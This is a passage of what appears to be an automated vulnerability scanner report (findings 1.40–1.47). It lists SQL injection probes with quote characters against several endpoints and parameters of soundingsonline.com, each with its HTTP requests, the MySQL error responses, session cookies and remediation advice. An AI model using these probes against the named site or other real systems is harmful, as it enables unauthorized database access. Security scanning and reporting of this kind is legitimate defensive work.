Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:37:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:37:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /features/justyesterday?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:37:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:37:47 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.40. http://www.soundingsonline.com/features/lifestyle [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/lifestyle

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /features/lifestyle?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:37:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:37:56 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /features/lifestyle?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.41. http://www.soundingsonline.com/features/profiles [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/profiles

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /features/profiles?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:37:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:37:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /features/profiles?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:37:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:37:56 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.42. http://www.soundingsonline.com/features/technical [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/technical

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /features/technical?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:09 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /features/technical?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:12 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.43. http://www.soundingsonline.com/features/type-of-boat [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/type-of-boat

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /features/type-of-boat?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:37:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:37:56 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /features/type-of-boat?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:37:59 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.44. http://www.soundingsonline.com/index.php [Itemid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /index.php

Issue detail

The Itemid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Itemid parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:48:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:48:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111'' AND ' at line 1</font>
...[SNIP]...

Request 2

GET /index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111'' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:48:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:48:56 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.45. http://www.soundingsonline.com/index.php [chronoformname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /index.php

Issue detail

The chronoformname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the chronoformname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /index.php?option=com_chronocontact&chronoformname=CGPage' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:46:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:46:59 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/index.php?option=com_chronocontact&chronoformname=CGPage'' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /index.php?option=com_chronocontact&chronoformname=CGPage'' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:47:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:47:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.46. http://www.soundingsonline.com/index.php [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /index.php

Issue detail

The id parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /index.php?option=com_content&view=category&layout=blog&id=98'&Itemid=111 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:48:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:48:50 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /index.php?option=com_content&view=category&layout=blog&id=98''&Itemid=111 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:48:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:48:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.47. http://www.soundingsonline.com/index.php [layout parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /index.php

Issue detail

The layout parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the layout parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /index.php?option=com_content&view=category&layout=blog'&id=98&Itemid=111 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:48:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:48:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

